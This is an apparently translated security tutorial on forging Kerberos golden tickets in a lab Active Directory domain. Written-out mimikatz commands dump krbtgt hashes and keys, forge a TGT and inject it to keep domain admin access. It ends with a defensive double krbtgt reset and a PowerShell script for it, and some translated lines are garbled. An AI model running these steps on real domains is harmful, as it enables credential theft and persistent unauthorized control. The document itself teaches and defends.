2025-03-31 Update From: SLTechnology News&Howtos
Shulou (Shulou.com) 06/02 Report
0x00 Preface
When domain penetration has succeeded and the domain controller has been captured, the attacker usually needs to keep their permissions in the domain and control the domain controller permanently. The golden ticket discussed in this article relies on a design weakness of Microsoft's Kerberos implementation together with the key material of the domain's krbtgt account to generate an arbitrary TGT, which can then be used against any Kerberos-authenticated service in the current domain. The attacker only needs to keep the krbtgt account's key material and inject the golden ticket into memory to regain the permissions, and the ticket is valid for 10 years.
0x01 Preparation
A domain controller and administrator privileges on it (if the DC has not been captured, is there any follow-up at all?)
mimikatz
0x02 Simulation environment
Domain controller: Windows Server 2008 R2, dc.test.com, 192.168.3.100
Domain member machine: Windows Server 2008 R2, client.test.com, 192.168.3.10
Out-of-domain machine: Windows 7, xxxxxx.xxx, 192.168.3.18
0x03 vulnerability self-test
I can only go to the diary.
0x04 Exploitation
1. Get the krbtgt account information
This includes the domain SID and the NTLM hash, or alternatively the aes256 or aes128 key, obtained by running mimikatz on the domain controller.
C:\Users\Administrator\Desktop> mimikatz.exe "privilege::debug" "lsadump::lsa /patch" exit
mimikatz(commandline) # privilege::debug
Privilege '20' OK
mimikatz(commandline) # lsadump::lsa /patch
Domain : TEST / S-1-5-21-1406004368-3818689962-3591297438
RID  : 000001f6
User : krbtgt
LM   :
NTLM : 80c073620041d7cc60c36ea12bdecb5d
// only the key parts are shown
To grab the aes256 key you need a different command; only one of aes256 or NTLM is required.
C:\Users\Administrator\Desktop> mimikatz.exe "privilege::debug" "lsadump::dcsync /domain:test.com /user:krbtgt" exit
mimikatz(commandline) # privilege::debug
Privilege '20' OK
mimikatz(commandline) # lsadump::dcsync /domain:test.com /user:krbtgt
[DC] 'test.com' will be the domain
[DC] 'dc.test.com' will be the DC server
[DC] 'krbtgt' will be the user account
Supplemental Credentials:
* Primary:Kerberos-Newer-Keys *
    Default Salt : TEST.COMkrbtgt
    Default Iterations : 4096
    Credentials
      aes256_hmac       (4096) : 7a615ae0d4b62a304ab086749b87ec0933dccb62c15e9fc2ca176bd4cf5ee8c5
      aes128_hmac       (4096) : aeb64a10f1fa77b344fb873ba04fa755
      des_cbc_md5       (4096) : dcd9ec620b26f7df
      rc4_plain         (4096) : 80c073620041d7cc60c36ea12bdecb5d
2. Generate the golden ticket (which is really just a TGT)
First use NTLM to generate the ticket
C:\Users\Administrator\Desktop> mimikatz.exe "kerberos::golden /user:Administrator /domain:<domain name> /sid:<domain SID> /krbtgt:<NTLM hash> /ticket:test.kirbi" exit
After execution, a ticket is generated in the current directory, named test.kirbi
Generate the ticket with the aes256 key
C:\Users\Administrator\Desktop> mimikatz.exe "kerberos::golden /user:Administrator /domain:<domain name> /sid:<domain SID> /aes256:<value> /ticket:xxx.kirbi" exit
After execution, a ticket named xxx.kirbi is generated in the current directory.
aes128 works the same way as aes256; just change the parameter name and value to /aes128:<value>
3. Ticket injection
Two machines are used for testing, one a domain member and the other outside the domain, to check whether any machine that can reach the domain can obtain domain admin rights through the ticket. Copy the ticket to both machines.
* In-domain machine test
[Figure: before the ticket is injected, the in-domain machine cannot access the domain controller]
mimikatz # kerberos::ptt aes256.kirbi    # the argument is the .kirbi ticket file name
[Figure: after the ticket is injected, the domain controller is accessed successfully]
* Out-of-domain machine test
Note that the out-of-domain machine must first have its DNS pointed at the domain controller or an in-domain DNS server; otherwise the hostname cannot be resolved.
The hostname now resolves normally.
[Figure: the machine is not joined to the domain]
[Figure: before the ticket is injected, the out-of-domain machine cannot access the domain controller]
[Figure: after the ticket is injected, the out-of-domain machine successfully accesses the domain controller]
0x05 Details
When accessing the domain controller you cannot use its IP address; you must use the domain name (hostname).
If there are any mistakes, please point them out, thank you!
0x06 Remediation
Once the domain has been compromised, not only the domain administrator password but also the krbtgt account password must be reset, and it must be reset twice to invalidate golden tickets; otherwise anyone holding a golden ticket can enter and leave the domain at will.
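The double krbtgt reset described above, written out as an added example (not part of the original article): each reset is performed on the PDC emulator and the script waits until every writable DC reports the new PasswordLastSet before continuing. It assumes the ActiveDirectory PowerShell module and Domain Admin rights; how long to wait between the two resets is the operator's decision.

```powershell
# Added example, not from the original article: reset krbtgt twice with replication checks.
Import-Module ActiveDirectory

function New-RandomPassword {
    # The value itself does not matter: nobody logs on as krbtgt, only the derived
    # Kerberos key is used, so 64 random bytes are as good as any password.
    $bytes = New-Object byte[] 64
    [System.Security.Cryptography.RandomNumberGenerator]::Create().GetBytes($bytes)
    return [Convert]::ToBase64String($bytes)
}

function Reset-KrbtgtOnce {
    param([string]$Pdc, [string[]]$WritableDcs)

    $before = (Get-ADUser krbtgt -Server $Pdc -Properties PasswordLastSet).PasswordLastSet
    $pw = ConvertTo-SecureString (New-RandomPassword) -AsPlainText -Force
    Set-ADAccountPassword -Identity krbtgt -Server $Pdc -Reset -NewPassword $pw

    # Poll every writable DC until its PasswordLastSet is newer than the value we
    # read before the reset, i.e. the new krbtgt key has replicated everywhere.
    foreach ($dc in $WritableDcs) {
        do {
            Start-Sleep -Seconds 15
            $seen = (Get-ADUser krbtgt -Server $dc -Properties PasswordLastSet).PasswordLastSet
        } while ($seen -le $before)
        Write-Host "$dc now holds the new krbtgt key (PasswordLastSet = $seen)"
    }
}

$pdc = (Get-ADDomain).PDCEmulator
$dcs = (Get-ADDomainController -Filter *) | Where-Object { -not $_.IsReadOnly } |
       ForEach-Object { $_.HostName }

# First reset: the old key becomes krbtgt's "previous" key, and tickets signed with it
# (including a golden ticket) are still accepted until the second reset replaces it.
Reset-KrbtgtOnce -Pdc $pdc -WritableDcs $dcs

# Second reset. Doing it immediately invalidates every TGT in the domain at once and
# forces all users and services to re-authenticate; waiting at least the maximum TGT
# lifetime (10 hours by default) lets legitimate tickets expire naturally first.
Reset-KrbtgtOnce -Pdc $pdc -WritableDcs $dcs
```

Read-only domain controllers use their own krbtgt_<id> accounts and are deliberately excluded from the replication check.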